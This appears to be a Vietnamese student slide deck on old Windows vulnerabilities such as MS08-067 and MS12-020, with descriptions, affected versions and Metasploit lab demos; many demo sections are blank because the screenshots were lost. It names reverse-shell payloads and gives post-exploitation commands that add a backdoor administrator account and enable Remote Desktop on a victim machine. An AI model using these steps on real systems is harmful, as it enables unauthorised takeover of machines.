Loi baomat windows(f)

LỖ HỎNG BẢO MẬT TRONG WINDOWS
1. Lỗ hổng MS13-071:
a. Mô tả:
Lỗ hổng có thể cho phép thực thi mã từ xa nếu người dùng áp dụng một chủ đề Windows thủ
công trên hệ thống của họ. Trong mọi trường hợp, người dùng không thể bị buộc phải mở tập tin hoặc
áp dụng các chủ đề, đối với một cuộc tấn công thành công, người dùng phải được thuyết phục để làm
như vậy.
b. Phần mềm bị ảnh hưởng:
Windows XP
Windows Vista
Windows Server 2003
Windows Server 2008
c. Demo:
Sử dụng mã lỗi ms13-071

Set payload reverse_tcp
Set các giá trị option
Tiến hành exploit

Bắt được session của victim

a. Mô tả:
Các lỗ hổng nghiêm trọng nhất có thể cho phép thực thi mã từ xa nếu người dùng xem một trang
web thiết kế đặc biệt sử dụng Internet Explorer . Một kẻ tấn công khai thác thành công nghiêm trọng
nhất của các lỗ hổng có thể lấy được quyền sử dụng giống như người dùng hiện hành . Người dùng có
tài khoản được cấu hình để có quyền sử dụng ít hơn trên hệ thống có thể được ít ảnh hưởng hơn so với
những người dùng hoạt động với người sử dụng quyền hành chính.
Internet Explorer 6, 7, 8, 9, 10, 11
c. Demo:

Set lhost

Set srvhost và ruipath
Tiến hành Exploit

a. Mô tả:
Lỗ hổng này có thể cho phép thực thi mã từ xa nếu người dùng xem một trang web thiết kế đặc
biệt bằng cách sử dụng một trình duyệt web hoặc nhấp vào một liên kết thiết kế đặc biệt trong một
thông báo e-mail.
Windows XP Service Pack 2 and Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 with SP2 for Itanium-based Systems
c. Demo:

Set payload reverse_tcp và
set giá trị srvhost và lhost
Bắt được session của victim

a. Mô tả:
Các lỗ hổng có thể cho phép thực thi mã từ xa nếu người dùng truy cập một trang web có chứa
nội dung đặc biệt được thiết kế để khai thác lỗ hổng. Trong mọi trường hợp, tuy nhiên, kẻ tấn công sẽ
không có cách nào để buộc người dùng truy cập một trang web như vậ. Thay vào đó, kẻ tấn công sẽ
phải thuyết phục người dùng truy cập các trang web, thường bằng cách cho họ bấm vào một liên kết
trong một email hoặc tin nhắn chỉ dẫn họ đến trang web của kẻ tấn công . Các tập tin độc hại có thể
được gửi như một file đính kèm email, nhưng những kẻ tấn công sẽ phải thuyết phục người sử dụng mở
file đính kèm để khai thác lỗ hổng.
Microsoft Office 2003, Microsoft Office 2007; Microsoft Office 2010 (except x64-based
editions); Microsoft SQL Server 2000 Analysis Services, Microsoft SQL Server 2000 (except
Itanium-based editions), Microsoft SQL Server 2005 (except Microsoft SQL Server 2005
Express Edition, but including Microsoft SQL Server 2005 Express Edition with Advanced
Services), Microsoft SQL Server 2008, Microsoft SQL Server 2008 R2, Microsoft BizTalk
Server 2002, Microsoft Commerce Server 2002, Microsoft Commerce Server 2007, Microsoft
Commerce Server 2009, Microsoft Commerce Server 2009 R2, Microsoft Visual FoxPro 8.0,
Microsoft Visual FoxPro 9.0, and Visual Basic 6.0 Runtime
c. Demo:

Set payload và các giá trị option cần
thiết

Di chuyển tập tin word vừa tạo ra
desktop và gửi cho victim
Tiến hành cấu hình handler để lắng
nghe

Set payload và option của handler
Tiến hành run handler và kết quả khi
victim chạy tập tin word, ta bắt được
session của viction

a. Mô tả:
Một lỗ hổng nghiêm trọng (Dos và Exec code) có thể cho phép thực thi mã từ xa nếu kẻ tấn
công gửi một gói SMB thiết kế đặc biệt với một máy tính chạy các dịch vụ Server.
Windows Vista, Windows Vista Service Pack 1, and Windows Vista Service Pack 2
Windows Vista x64 Edition, Windows Vista x64 Edition Service Pack 1, and Windows Vista
x64 Edition Service Pack 2
Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service
Pack 2
Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems
Service Pack 2
Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based
Systems Service Pack 2
c. Demo:

và các option cần thiết
Tiến hành exploit và bắt
được session của victim

a. Mô tả:
Một lỗ hổng được công bố công khai trong Windows Shell. Các lỗ hổng có thể cho phép thực
thi mã từ xa nếu biểu tượng của một phím tắt thiết kế đặc biệt được hiển thị. Một kẻ tấn công khai thác
thành công lỗ hổng này có thể đạt được các quyền người dùng tương tự như người dùng địa phương.
Người dùng có tài khoản được cấu hình để có quyền sử dụng ít hơn trên hệ thống có thể được ít ảnh
hưởng hơn so với những người dùng hoạt động với người sử dụng quyền hành chính.
Lỗi nguy hiểm nằm trong các tập tin "shortcut" (định dạng *.Ink) của Windows, các tập tin này
thường nằm ở giao diện desktop hay trình đơn Start. Bằng cách tạo ra một tập tin shortcut nhúng mã
độc, tin tặc có thể tự động thực thi mã độc khi người dùng xem tập tin shortcut hay nội dung của một
thư mục chứa tập tin shortcut nhúng mã độc.
Bản vá lỗi có chứa đựng phiên bản mới của tập tin Shell32.dll, đây là phần cập nhật quan trọng.
Shell32.dll là một tập tin thư viện rất quan trọng trong Windows, nó chứa đựng một số hàm Windows
Shell API. Nếu Shell32.dll bị lỗi hay cập nhật lỗi, máy tính sẽ có tình trạng "Màn hình xanh chết chóc"
(Blue Screen of Death - BSOD).
Windows XP Service Pack 3
Windows Vista Service Pack 1 and Windows Vista Service Pack 2
Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2
Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service
Pack 2
Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems
Service Pack 2
Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based
Windows 7 for 32-bit Systems
Windows 7 for x64-based Systems
Windows Server 2008 R2 for x64-based Systems

Windows Server 2008 R2 for Itanium-based Systems
c. Demo
1.
2.

a. Mô tả:
Hai lỗ hổng bảo mật riêng tư trong Remote Desktop Protocol (Exec Code và DoS). Lỗ hổng có
thể cho phép thực thi mã từ xa nếu một kẻ tấn công gửi một chuỗi các gói RDP thiết kế đặc biệt với
một hệ thống bị ảnh hưởng. Theo mặc định, Remote Desktop Protocol (RDP) không được kích hoạt
trên bất kỳ hệ điều hành Windows. Các hệ thống không đã kích hoạt RDP không có nguy cơ.
Windows Vista Service Pack 2
Windows Vista x64 Edition Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for Itanium-based Systems Service Pack 2
Windows 7 for 32-bit Systems and Windows 7 for 32-bit Systems Service Pack 1
Windows 7 for x64-based Systems and Windows 7 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems and Windows Server 2008 R2 for x64-based
Windows Server 2008 R2 for Itanium-based Systems and Windows Server 2008 R2 for Itanium-
based Systems Service Pack 1
c. Demo

Sử dụng mã lỗi
ms12-020
Set options
Tiến hành run

Máy của victim đã
bị dump
a. Mô tả:
Lỗ hổng có thể cho phép nâng quyền nếu một kẻ tấn công đăng nhập vào hệ thống của người sử
dụng và chạy một ứng dụng thiết kế đặc biệt. Một kẻ tấn công phải có các thông tin đăng nhập hợp lệ
và có thể đăng nhập cục bộ để khai thác lỗ hổng.
Windows XP
Windows Server 2003
c. Demo

Set payload và các option cần
thiết
Khi victim truy cập vào link thì
chúng ta bắt được session của
victim

a. Mô tả:
Các lỗ hổng có thể cho phép thực thi mã từ xa nếu người dùng mở một tập tin phương tiện
truyền thông thiết kế đặc biệt. Một kẻ tấn công khai thác thành công lỗ hổng có thể lấy được quyền sử
dụng giống như người dùng địa phương. Người dùng có tài khoản được cấu hình để có quyền sử dụng
ít hơn trên hệ thống có thể được ít ảnh hưởng hơn so với những người dùng hoạt động với người sử
dụng quyền hành chính..
Windows XP
Windows Server 2003
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
c. Demo
1. Use
exploit/windows/browser/ms12_
004_midi

2. Xem IP máy attacker:
Ifconfig
3. set SRVHOST máy attacker

4. set PAYLOAD
windows/meterpreter/reverse_tc
p
5. set LHOST 192.168.0.7

10. Lỗ hổng MS10-073:
a. Mô tả:
một số lỗ hổng bảo mật được tiết lộ công khai trong các trình điều khiển hạt nhân-mode
Windows. Nghiêm trọng nhất trong số các lỗ hổng có thể cho phép nâng quyền nếu một kẻ tấn công
đăng nhập vào một hệ thống bị ảnh hưởng và chạy một ứng dụng thiết kế đặc biệt. Một kẻ tấn công
phải có các thông tin đăng nhập hợp lệ và có thể đăng nhập cục bộ để khai thác lỗ hổng này. Dễ bị tổn
thương không thể bị khai thác từ xa hoặc bởi người dùng vô danh.
Windows XP
Windows Server 2003
Windows Vista
Windows Server 2008
Windows 7
c. Demo:
1.

11. Lỗ hổng MS10-061:
a. Mô tả:
Các lỗ hổng có thể cho phép thực thi mã từ xa nếu kẻ tấn công gửi một yêu cầu in thiết kế đặc
biệt với một hệ thống dễ bị tổn thương có một giao diện spooler in tiếp xúc qua RPC . Theo mặc định ,
máy in không được chia sẻ trên bất kỳ hệ điều hành Windows hỗ trợ.
Windows XP
Windows Server 2003
Windows Vista
Windows Server 2008
Windows 7
c. Demo:
1.

12. Lỗ hổng MS10-046:
a. Mô tả:
một lỗ hổng được công bố công khai trong Windows Shell. Các lỗ hổng có thể cho phép thực thi
mã từ xa nếu biểu tượng của một phím tắt thiết kế đặc biệt được hiển thị. Một kẻ tấn công khai thác
thành công lỗ hổng này có thể đạt được các quyền người dùng tương tự như người dùng địa phương.
Người dùng có tài khoản được cấu hình để có quyền sử dụng ít hơn trên hệ thống có thể được ít ảnh
hưởng hơn so với những người dùng hoạt động với người sử dụng quyền hành chính.
Windows XP
Windows Server 2003
Windows Vista
Windows Server 2008
Windows 7
c. Demo:
1.

13. Lỗ hổng MS11-006:
a. Mô tả:
một lỗ hổng được công bố công khai trong bộ vi xử lý đồ họa Windows Shell. Các lỗ hổng có
thể cho phép thực thi mã từ xa nếu người dùng xem một hình ảnh thu nhỏ thiết kế đặc biệt. Một kẻ tấn
công khai thác thành công lỗ hổng này có thể lấy được quyền sử dụng giống như người dùng đăng
nhập vào. Người dùng có tài khoản được cấu hình để có quyền sử dụng ít hơn trên hệ thống có thể
được ít ảnh hưởng hơn so với những người dùng hoạt động với người sử dụng quyền hành chính.
Windows XP
Windows Server 2003
Windows Vista
Windows Server 2008
c. Demo:
1.

14. Lỗ hổng MS08-067:
a. Mô tả:
Các lỗ hổng có thể cho phép thực thi mã từ xa nếu một hệ thống bị ảnh hưởng nhận được yêu
cầu RPC đặc biệt. Trên Microsoft Windows 2000, Windows XP, và 2003 hệ thống Windows Server, kẻ
tấn công có thể khai thác lỗ hổng này mà không cần xác thực để chạy mã nhị phân. Có thể là lỗ hổng
này có thể được sử dụng trong crafting của một wormable khai thác. Tường lửa thực hành tốt nhất và
cấu hình tường lửa mặc định tiêu chuẩn có thể giúp bảo vệ tài nguyên mạng từ các cuộc tấn công có
nguồn gốc bên ngoài chu vi doanh nghiệp.
Microsoft Windows 2000 Service Pack 4
Windows XP Professional x64 Edition
Windows Server 2003 x64 Edition
Windows Vista and Windows Vista Service Pack 1
Windows Vista x64 Edition and Windows Vista x64 Edition Service Pack 1
Windows Server 2008 for 32-bit Systems
Windows Server 2008 for x64-based Systems
Windows Server 2008 for Itanium-based Systems
c. Demo:

1. Khởi động chương trình msfgui
 Chọn menu Exploits 
windows  More…  smb 
ms08_067_netapi
2. Phần Targets để Automatics
Targeting

3. Về Payload chọn
windows/shell_bind_tcp
4. RHOST: Điền IP của máy
Victim
5. Click Run exploit

6. Nếu Exploit thành công sẽ có 1
session được tạo ra, double click
vào session đó để vào cmd của
máy Victim
7. Để kiểm tra xem đây có phải là
cmd của máy Victim không. Ta
dùng lệnh ipconfig
8. Tạo 1 user: luanvan, password:
123 với lệnh
net user luanvan 123 /add

9. Add user vừa tạo vào group
Administrators bằng lệnh
net localgroup administrators
luanvan /add
10.Remote desktop tới máy Victim
thất bại vì máy Victim chưa bật
Remote Desktop

11.Để bật chức năng remote
Desktop của máy Victim ta dùng
lệnh:
reg add
"HKEY_LOCAL_MACHINE
SYSTEM
CurrentControlSet
Control
Terminal Server" /v
fDenyTSConnections /t
REG_DWORD /d 0 /f
12.Hoàn toàn chiếm được quyền
điều khiển máy Victim

Loi baomat windows(f)

Recommended

Recommended

More Related Content

What's hot

What's hot (20)

Viewers also liked

Viewers also liked (20)

Similar to Loi baomat windows(f)

Similar to Loi baomat windows(f) (20)

Loi baomat windows(f)